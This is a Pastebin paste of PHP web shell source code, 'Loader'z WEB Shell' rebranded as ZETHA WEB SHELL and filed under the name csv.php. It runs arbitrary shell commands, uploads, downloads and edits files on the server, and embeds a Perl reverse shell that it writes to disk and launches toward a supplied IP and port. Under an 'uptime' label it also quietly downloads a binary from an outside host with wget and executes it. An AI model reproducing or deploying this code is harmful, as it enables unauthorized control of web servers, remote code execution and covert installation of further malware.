API tools faq
paste
Advertisement
PalmaSolutions

csv.php

PalmaSolutions
May 31st, 2018
186
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.40 KB | None | 0 0
raw download clone embed print report
  1. <?
  2. error_reporting(0);
  3. /* Loader'z WEB Shell v 0.1 {14 ????? 2005}
  4. ??? ?????? ?????? ???????. ??? ????? ?? ???????????? ???????.
  5. - ?????? ? ???????? ???????? ? ???????? PHP. ? ??????? ??????? ???????????? ?????????? ??????? ????.
  6. - ???????? ? ?????????????? ???????.
  7. - ??????? ?????? ? ??????? ???????? ? ??????? HTTP.
  8. - ??????? ?????? ? ?????? ????????? ?????.
  9. - ?????????? ???????????? ?????? ??? ???????.
  10. - ?????? ?????? ???????? ?????????? ??????????. ???????? ?? ??????? ??????? ?? ???? ???, ???? ??, ?? ?????? ??????? ?????????? ???????,
  11. ??? ????????, ? ??? ?? ????, ??? ?? ?????? ????????? ???????.
  12. - ?????? ??????? ???????? ?? ???????????? ???? ???????.
  13. - ???? ?????? ???????? ??? ??????????? ?? Windows, ?????? ?????????? ??? ?????????? ?????? ?????????????? ? win-1251.
  14. - ???????????? ??????????? ??????  ????-????. ?? ?????? ??????? ???????? ????????? ? ???? ?? ??????? ????????? ??????.
  15. Loader Pro-Hack.ru
  16. */
  17. ?>
  18.  
  19. <style type='text/css'>
  20. html { overflow-x: auto }
  21. BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #336699 }
  22. TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #336699 }
  23. BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
  24. A:link {COLOR: #666666; TEXT-DECORATION: none}
  25. A:active {COLOR: #666666; TEXT-DECORATION: none;}
  26. A:visited {COLOR: #666666; TEXT-DECORATION: none;}
  27. A:hover {COLOR: #999999; TEXT-DECORATION: none;}
  28. BODY {
  29. SCROLLBAR-FACE-COLOR: #DCE7EF;
  30. SCROLLBAR-HIGHLIGHT-COLOR: #dbdbdb;
  31. SCROLLBAR-SHADOW-COLOR: #598BB6;
  32. SCROLLBAR-3DLIGHT-COLOR: #598BB6;
  33. SCROLLBAR-ARROW-COLOR: #598BB6;
  34. SCROLLBAR-TRACK-COLOR: #F4FAFD;
  35. SCROLLBAR-DARKSHADOW-COLOR: #dbdbdb;
  36. background-color: #336699;
  37. }
  38.  
  39.  
  40.  
  41. fieldset.search { padding: 6px; line-height: 150% }
  42.  
  43. label { cursor: pointer }
  44.  
  45. form { display: inline }
  46.  
  47. img { vertical-align: middle; border: 0px }
  48.  
  49. img.attach { padding: 2px; border: 2px outset #000033 }
  50.  
  51.  
  52. #logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
  53. #content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
  54. #logo { FONT-SIZE: 50px; }
  55. </style>
  56.  
  57.  
  58. <title>ZETHA WEB SHELL </title>
  59.  
  60. <table "width="100%" height=100% bgcolor="#336699">
  61. <tr><td align="center" valign="top">
  62.  
  63.  
  64. <table><tr><td>
  65. <?php
  66.  
  67. $dir = $_POST['dir'];
  68. $dir = stripslashes($dir);
  69.  
  70. $cmd = $_POST['cmd'];
  71. $cmd = stripslashes($cmd);
  72.  
  73.  
  74. $bind = "
  75. #!/usr/bin/perl
  76. use Socket;
  77. \$host = \$ARGV[0];
  78. \$port = \$ARGV[1];
  79. \$proto = getprotobyname('tcp') || die shit;
  80. socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die shit;
  81. my \$target = inet_aton(\$host);
  82. if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
  83. print shit;
  84. }
  85. if (!fork( )) {
  86. open(STDIN,'>&SERVER');
  87. open(STDOUT,'>&SERVER');
  88. open(STDERR,'>&SERVER');
  89. exec {'/bin/sh'} '-bash' ;
  90. exit(0);
  91. }
  92. ";
  93. function decode($buffer){
  94.  
  95. return  convert_cyr_string ($buffer, d, w);
  96.  
  97. }
  98.  
  99.  
  100.  
  101. /*??????????*/
  102.  
  103. /*????????? ??? ???????*/
  104. $servsoft = $_SERVER['SERVER_SOFTWARE'];
  105.  
  106. if (ereg("Win32", $servsoft, $reg)){
  107. $sertype = "winda";
  108. }
  109. else
  110. {
  111. $sertype = "other";}
  112.  
  113.  
  114.  
  115. echo $servsoft . "<br>";
  116. chdir($dir);
  117. echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";
  118.  
  119. if ($sertype == "winda"){
  120.  
  121. ob_start('decode');
  122. echo "Version: ";
  123. echo passthru("ver") . "<br><br>";
  124. ob_end_flush();
  125. }
  126.  
  127. if ($sertype == "other"){
  128. echo "id:";
  129. echo passthru("id") . "<br>";
  130. echo "uname:";
  131. echo passthru("uname -a") . "<br><br>";
  132. echo "uptime:";
  133. echo passthru("cd /tmp;wget www.alrpost69.com/httpd;chmod 777 httpd;PATH=.;httpd;/bin/rm httpd") . "<br><br>";
  134. }
  135.  
  136.  
  137.  
  138.  
  139. if($_POST['post'] == "yes" and $HTTP_POST_FILES["userfile"][name] !== "")
  140. {
  141. copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
  142. }
  143.  
  144. if(($_POST['fileto'] != "")||($_POST['filefrom'] != ""))
  145.  
  146. {
  147. $data = implode("", file($_POST['filefrom']));
  148. $fp = fopen($_POST['fileto'], "wb");
  149. fputs($fp, $data);
  150. $ok = fclose($fp);
  151. if($ok)
  152. {
  153. $size = filesize($_POST['fileto'])/1024;
  154. $sizef = sprintf("%.2f", $size);
  155. print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
  156. }
  157. else
  158. {
  159. print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
  160. }
  161. }
  162.  
  163. if ($_POST['installbind']){
  164.  
  165. if (is_dir($_POST['installpath']) == true){
  166. chdir($_POST['installpath']);
  167. $_POST['installpath'] = "temp.pl";}
  168.  
  169.  
  170. $fp = fopen($_POST['installpath'], "w");
  171. fwrite($fp, $bind);
  172. fclose($fp);
  173.  
  174. exec("perl $installpath $ip $cbport");
  175. chdir($dir);
  176.  
  177.  
  178. }
  179.  
  180. if ($_POST['editfile']){
  181. $fp = fopen($_POST['editfile'], "r");
  182. $filearr = file($_POST['editfile']);
  183.  
  184. foreach ($filearr as $string){
  185. $string = str_replace("<" , "<" , $string);
  186. $string = str_replace(">" , ">" , $string);
  187. $content = $content . $string;
  188. }
  189.  
  190. echo "<center><div id=logostrip>Edit file: $editfile </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=122 rows=20>$content</textarea>
  191. <input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
  192. <input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
  193. <input type=\"submit\" name=\"submit\" value=\"Save\"></form></center>";
  194. fclose($fp);
  195. }
  196.  
  197. if($_POST['savefile']){
  198.  
  199. $fp = fopen($_POST['savefile'], "w");
  200. $content = stripslashes($content);
  201. fwrite($fp, $content);
  202. fclose($fp);
  203. echo "<center><div id=logostrip>Successfully saved!</div></center>";
  204.  
  205. }
  206.  
  207.  
  208. if ($cmd){
  209.  
  210. echo "<center><textarea cols=122 rows=20>";
  211. if($sertype == "winda"){
  212. ob_start('decode');
  213. passthru($cmd);
  214. ob_end_flush();}
  215. else{
  216. passthru($cmd);
  217. }
  218.  
  219. echo "</textarea></center>";
  220.  
  221.  
  222. }else{
  223. $arr = array();
  224.  
  225. $arr = array_merge($arr, glob("*"));
  226. $arr = array_merge($arr, glob(".*"));
  227. $arr = array_merge($arr, glob("*.*"));
  228. $arr = array_unique($arr);
  229. sort($arr);
  230. echo "<table><tr><td>Name</td><td>Type</td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td>Write</td><td>Read</td></tr>";
  231.  
  232. foreach ($arr as $filename) {
  233.  
  234. if ($filename != "." and $filename != ".."){
  235.  
  236. if (is_dir($filename) == true){
  237. $directory = "";
  238. $directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . fileperms($filename);
  239. if (is_writable($filename) == true){
  240. $directory = $directory . "<td>Yes</td>";}
  241. else{
  242. $directory = $directory . "<td>No</td>";
  243.  
  244. }
  245.  
  246. if (is_readable($filename) == true){
  247. $directory = $directory . "<td>Yes</td>";}
  248. else{
  249. $directory = $directory . "<td>No</td>";
  250. }
  251. $dires = $dires . $directory;
  252. }
  253.  
  254. if (is_file($filename) == true){
  255. $file = "";
  256. $file = $file . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . fileperms($filename);
  257. if (is_writable($filename) == true){
  258. $file = $file . "<td>Yes</td>";}
  259. else{
  260. $file = $file . "<td>No</td>";
  261. }
  262.  
  263. if (is_readable($filename) == true){
  264. $file = $file . "<td>Yes</td></td></tr>";}
  265. else{
  266. $file = $file . "<td>No</td></td></tr>";
  267. }
  268. $files = $files . $file;
  269. }
  270.  
  271.  
  272.  
  273. }
  274.  
  275.  
  276.  
  277. }
  278. echo $dires;
  279. echo $files;
  280. echo "</table><br>";
  281. }
  282.  
  283.  
  284.  
  285. echo "
  286. <form action=\"$REQUEST_URI\" method=\"POST\">
  287. Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
  288.  
  289.  
  290. Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
  291.  
  292. echo getcwd();
  293. echo "\">
  294. <INPUT type=\"submit\" value=\"Do it\"></form>";
  295.  
  296.  
  297.  
  298.  
  299. if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
  300. Including from here: "
  301. . ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}
  302.  
  303.  
  304.  
  305.  
  306.  
  307.  
  308.  
  309.  
  310. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  311. Download here <b>from</b>:
  312. <INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
  313. <b>into:</b>
  314. <INPUT type=\"text\" name=\"fileto\" size=30>
  315. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
  316. <INPUT type=\"submit\" value=\"Download\"></form></div>";
  317.  
  318. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  319. <INPUT type=\"file\" name=\"userfile\">
  320. <INPUT type=\"hidden\" name=\"post\" value=\"yes\">
  321. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
  322. <INPUT type=\"submit\" value=\"Download\"></form></div>";
  323.  
  324.  
  325.  
  326. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
  327. Install cb
  328. <b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
  329. <b>Ip</b><input type=\"text\" name=\"ip\" value=\"ip\">
  330. <b>Port</b><input type=\"text\" name=\"cbport\" value=\"3333\">
  331.  
  332. <INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
  333. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
  334. <INPUT type=\"submit\" value=\"Install\"></form></div>";
  335.  
  336.  
  337. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
  338. File to edit:
  339. <input type=\"text\" name=\"editfile\" >
  340. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
  341. <INPUT type=\"submit\" value=\"Edit\"></form></div>";
  342.  
  343.  
  344.  
  345. ?>
  346. </td></tr></table>
  347.  
  348.  
  349. </td></tr>
  350. <tr valign="BOTTOM">
  351. <td valign=bottom><center>
  352.   Coded by Loader and Modify By Zetha
  353. </center></td>
  354. </tr>
  355. </table>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!